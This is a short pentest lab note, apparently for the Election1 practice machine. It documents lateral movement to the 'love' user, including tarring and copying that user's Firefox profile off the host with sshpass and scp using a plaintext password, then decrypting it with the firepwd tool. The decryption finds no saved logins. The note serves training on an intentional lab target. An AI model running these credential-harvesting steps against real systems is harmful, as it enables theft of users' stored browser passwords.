InfoSec LAB

Election1_Firefox

Created: 2 min read

Firefox

Firefox profile has been identified in the home directory of the love user on the election host; /home/love/.mozila Lateral Movement has been made to the love user.

love@election:~$ tar -czf firefox.tar.gz .mozilla/firefox
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sshpass -p 'P@$$w0rd@123' scp love@$IP:~/firefox.tar.gz .

packaged and transferred

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ tar -xf firefox.tar.gz

Extracted

Decryption

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ git clone https://github.com/lclevy/firepwd ; python3 -m venv firepwd/.venv ; source firepwd/.venv/bin/activate ; pip3 install -r firepwd/requirements.txt
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80 (from 1)
Receiving objects: 100% (88/88), 239.08 KiB | 3.68 MiB/s, done.
Resolving deltas: 100% (41/41), done.
Collecting PyCryptodome>=3.9.0 (from -r firepwd/requirements.txt (line 1))
  Using cached pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)
Collecting pyasn1>=0.4.8 (from -r firepwd/requirements.txt (line 2))
  Using cached pyasn1-0.6.1-py3-none-any.whl.metadata (8.4 kB)
Using cached pycryptodome-3.23.0-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.3 MB)
Using cached pyasn1-0.6.1-py3-none-any.whl (83 kB)
Installing collected packages: PyCryptodome, pyasn1
Successfully installed PyCryptodome-3.23.0 pyasn1-0.6.1

firepwd

┌──(.venv)─(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ python3 firepwd/firepwd.py -d .mozilla/firefox/y55nwd4d.default-release 
globalSalt: b'60a502c92d1c20736a4cfd37b4b227bd3046d6c3'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'cc7f8aa256d771b404297e33c0f456efb2b1170c2705c631c851bcbd37678dae'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'73e9c3f310fd53398ac0f9a55002'
       }
     }
   }
   OCTETSTRING b'196bdc79fd0061e5e944b2da95f30bca'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
no saved login/password

N/A

Interactive Graph View

Backlinks